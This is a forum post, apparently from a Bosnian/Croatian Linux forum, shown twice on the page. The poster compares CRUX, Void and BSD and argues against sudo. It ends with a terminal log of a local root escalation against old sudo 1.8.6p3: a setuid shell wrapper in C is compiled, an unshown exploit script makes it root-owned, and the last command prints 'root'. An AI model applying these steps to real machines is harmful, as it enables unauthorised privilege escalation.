Meni
Forumi
Nove poruke
Sve teme
Najnovije teme
Nove poruke
♫ Radio
Dnevnici
Dnevnici Vanjskog Uzgajanja
Dnevnici Unutrašnjeg Uzgajanja
Završeni Vanjski Dnevnici
Završeni Unutrašnji Dnevnici
Novo
Popularne teme
Nove poruke
Najnovije aktivnosti
Članovi
Trenutno prisutni
Forumi
Prijava
Registracija
Nove poruke
Sve teme
Najnovije teme
Nove poruke
Meni
Install the app
Install
Objavite odgovor
Forumi
Sve što nema svoje mjesto
Svijet Interneta i Kompjutera
Linux Distribucije
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
Koristite zastareli pregledač. Možda neće pravilno prikazivati ove ili druge veb stranice.
Trebali biste nadograditi ili koristiti
alternativni pregledač
.
Poruka
<blockquote data-quote="Prater" data-source="post: 777020" data-attributes="member: 27820"><p>koristim linux neko vrijeme, ali moram priznat da me velika vecina distribucija smorila.</p><p></p><p>kernel je postao prenatrpan, a odrzavanje vlastite kernel konfiguracije za raznoliki hardware zahtjeva odvajanje odredjene kolicine vremena, truda ali i dobru organizaciju. smatram da se ne isplati osim ako se ne radi o masovnom deploymentu, zanimaciji i ucenju ili o nekoj veoma bitnoj masini koja mora biti maksimalno osigurana.</p><p></p><p>ne volim obavezu kada treba napraviti major upgrade na novi release. to znaci downtime i mogucnost da upgrade nece proci kako treba. dvije masine jos uvijek vrte CentOS 6 koji je odavno end-of-life. naravno neda mi se radit upgrade.</p><p></p><p>zanima me sigurnost, stoga mi je prenatrpani kernel poceo smetat, a konfiguracija svakih malo oduzimati previse vremena. uz to na sistemu ne zelim imati alate/procese/pakete za koje ne znam sta rade.</p><p></p><p>kao inicijalno rjesenje za svoj problem sam nasao linux distribuciju CRUX. minimalisticka, unix-like distra na kojoj skoro sve morate radit rucno, ukljucujuci buildanje kernela, dependencya i paketa. obuzet minimalizmom i sigurnosti prelazim na BSD, ocaran istovremeno jednostavnosti i kompleksnosti ostajem na njemu dvije godine, ali primjecujem pad produktivnosti. razlika ulozenog vremena i truda naspram linuxa da se dobije zeljeno je prevelika (kako za sta). za to vrijeme sam na BSD naucio jako puno. i dalje ga vrtim na dva RPI uredaja 24/7 i jednom laptopu.</p><p></p><p>naisao sam na jednu rolling distru Void, koja omogucava buildanje svojih paketa iz templatea ali i koristenje gotovih paketa. takodjer sadrzi dosta security related paketa. sa ovom distrom sam takodjer rjesio problem obaveze major upgradea na novi release jer se radi o rolling distri.</p><p></p><p>ipak razmisljam preci nazad na CRUX za glavni workstation jer zelim imati vise kontrole nad sistemom, a to mogu dobiti samo ako ju dobro osiguram, sve buildam i ne koristim pakete.</p><p></p><p>[URL unfurl="false"]https://crux.nu/[/URL]</p><p>[URL unfurl="false"]https://netbsd.org/[/URL]</p><p>[URL unfurl="false"]https://voidlinux.org/[/URL]</p><p></p><p>edit: da nadodam jednu stvar. po meni vecina linux distri je radjena na isti kalup, mjenjaju se kernel konfiguracije, package manager, userland i konfe, desktop environment, tim koji radi na distribuciji i targeted platforma (desktop/server/embedded/mobile/...). tako je barem u siroj slici vecine korisnika. hocu reci da su mi te modifikacije postale nebitne jer niti jedna distra mi ne zadovoljava sve potrebe. takodjer iz razloga sto aktivno koristim mali broj alata, jednostavnije mi je uzeti neku minimalisticku distru i konfigurirati sto i kako mi treba. kod servera mi je bitan update stoga tu biram distru koja ima prebuilt pakete.</p><p></p><p><img src="https://imgs.xkcd.com/comics/incident.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>^ ne koristim sudo niti doas jer otvaraju previse mogucih sigurnosnih problema, a 'su -' je i vise nego dovoljan u vecini slucajeva.</p><p></p><p>evo jedan log testiranja od prije par tjedana - mislim da je bila centos masina, drugaru se isto kao i meni neda radit upgrade, zato postoje odredjene posljedice. <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="smilie smilie--sprite smilie--sprite1" alt=":)" title="Smile :)" loading="lazy" data-shortname=":)" /></p><p></p><p>[CODE]$ sudo -V</p><p>Sudo version 1.8.6p3</p><p>Sudoers policy plugin version 1.8.6p3</p><p>Sudoers file grammar version 42</p><p>Sudoers I/O plugin version 1.8.6p3</p><p></p><p>$ cat /tmp/su.c</p><p>#define _GNU_SOURCE</p><p>#include <stdio.h></p><p>#include <unistd.h></p><p></p><p>int main(int argc, char *argv[]) {</p><p> setresuid(0,0,0);</p><p> execl("/bin/sh", "sh", "-c", argv[1], (char *) NULL);</p><p>}</p><p></p><p>$ gcc /tmp/su.c -o /tmp/su</p><p></p><p>$ whoami</p><p>data</p><p></p><p>$ ls -la /tmp/su</p><p>-rwxr-xr-x 1 data data 6623 Mar 22 11:53 /tmp/su</p><p></p><p>$ /tmp/su whoami</p><p>data</p><p></p><p>$ python e.py</p><p>command size: 0x1370</p><p>offset to defaults: 0x0</p><p>success at 40</p><p></p><p>$ ls -la /tmp/su</p><p>-rwsr-xr-x 1 root root 6623 Mar 22 11:53 /tmp/su</p><p></p><p>$ /tmp/su whoami</p><p>root[/CODE]</p></blockquote><p></p>
[QUOTE="Prater, post: 777020, member: 27820"] koristim linux neko vrijeme, ali moram priznat da me velika vecina distribucija smorila. kernel je postao prenatrpan, a odrzavanje vlastite kernel konfiguracije za raznoliki hardware zahtjeva odvajanje odredjene kolicine vremena, truda ali i dobru organizaciju. smatram da se ne isplati osim ako se ne radi o masovnom deploymentu, zanimaciji i ucenju ili o nekoj veoma bitnoj masini koja mora biti maksimalno osigurana. ne volim obavezu kada treba napraviti major upgrade na novi release. to znaci downtime i mogucnost da upgrade nece proci kako treba. dvije masine jos uvijek vrte CentOS 6 koji je odavno end-of-life. naravno neda mi se radit upgrade. zanima me sigurnost, stoga mi je prenatrpani kernel poceo smetat, a konfiguracija svakih malo oduzimati previse vremena. uz to na sistemu ne zelim imati alate/procese/pakete za koje ne znam sta rade. kao inicijalno rjesenje za svoj problem sam nasao linux distribuciju CRUX. minimalisticka, unix-like distra na kojoj skoro sve morate radit rucno, ukljucujuci buildanje kernela, dependencya i paketa. obuzet minimalizmom i sigurnosti prelazim na BSD, ocaran istovremeno jednostavnosti i kompleksnosti ostajem na njemu dvije godine, ali primjecujem pad produktivnosti. razlika ulozenog vremena i truda naspram linuxa da se dobije zeljeno je prevelika (kako za sta). za to vrijeme sam na BSD naucio jako puno. i dalje ga vrtim na dva RPI uredaja 24/7 i jednom laptopu. naisao sam na jednu rolling distru Void, koja omogucava buildanje svojih paketa iz templatea ali i koristenje gotovih paketa. takodjer sadrzi dosta security related paketa. sa ovom distrom sam takodjer rjesio problem obaveze major upgradea na novi release jer se radi o rolling distri. ipak razmisljam preci nazad na CRUX za glavni workstation jer zelim imati vise kontrole nad sistemom, a to mogu dobiti samo ako ju dobro osiguram, sve buildam i ne koristim pakete. [URL unfurl="false"]https://crux.nu/[/URL] [URL unfurl="false"]https://netbsd.org/[/URL] [URL unfurl="false"]https://voidlinux.org/[/URL] edit: da nadodam jednu stvar. po meni vecina linux distri je radjena na isti kalup, mjenjaju se kernel konfiguracije, package manager, userland i konfe, desktop environment, tim koji radi na distribuciji i targeted platforma (desktop/server/embedded/mobile/...). tako je barem u siroj slici vecine korisnika. hocu reci da su mi te modifikacije postale nebitne jer niti jedna distra mi ne zadovoljava sve potrebe. takodjer iz razloga sto aktivno koristim mali broj alata, jednostavnije mi je uzeti neku minimalisticku distru i konfigurirati sto i kako mi treba. kod servera mi je bitan update stoga tu biram distru koja ima prebuilt pakete. [IMG]https://imgs.xkcd.com/comics/incident.png[/IMG] ^ ne koristim sudo niti doas jer otvaraju previse mogucih sigurnosnih problema, a 'su -' je i vise nego dovoljan u vecini slucajeva. evo jedan log testiranja od prije par tjedana - mislim da je bila centos masina, drugaru se isto kao i meni neda radit upgrade, zato postoje odredjene posljedice. :) [CODE]$ sudo -V Sudo version 1.8.6p3 Sudoers policy plugin version 1.8.6p3 Sudoers file grammar version 42 Sudoers I/O plugin version 1.8.6p3 $ cat /tmp/su.c #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setresuid(0,0,0); execl("/bin/sh", "sh", "-c", argv[1], (char *) NULL); } $ gcc /tmp/su.c -o /tmp/su $ whoami data $ ls -la /tmp/su -rwxr-xr-x 1 data data 6623 Mar 22 11:53 /tmp/su $ /tmp/su whoami data $ python e.py command size: 0x1370 offset to defaults: 0x0 success at 40 $ ls -la /tmp/su -rwsr-xr-x 1 root root 6623 Mar 22 11:53 /tmp/su $ /tmp/su whoami root[/CODE] [/QUOTE]
Verifikacija
Objavite odgovor
Forumi
Sve što nema svoje mjesto
Svijet Interneta i Kompjutera
Linux Distribucije
Top
Bottom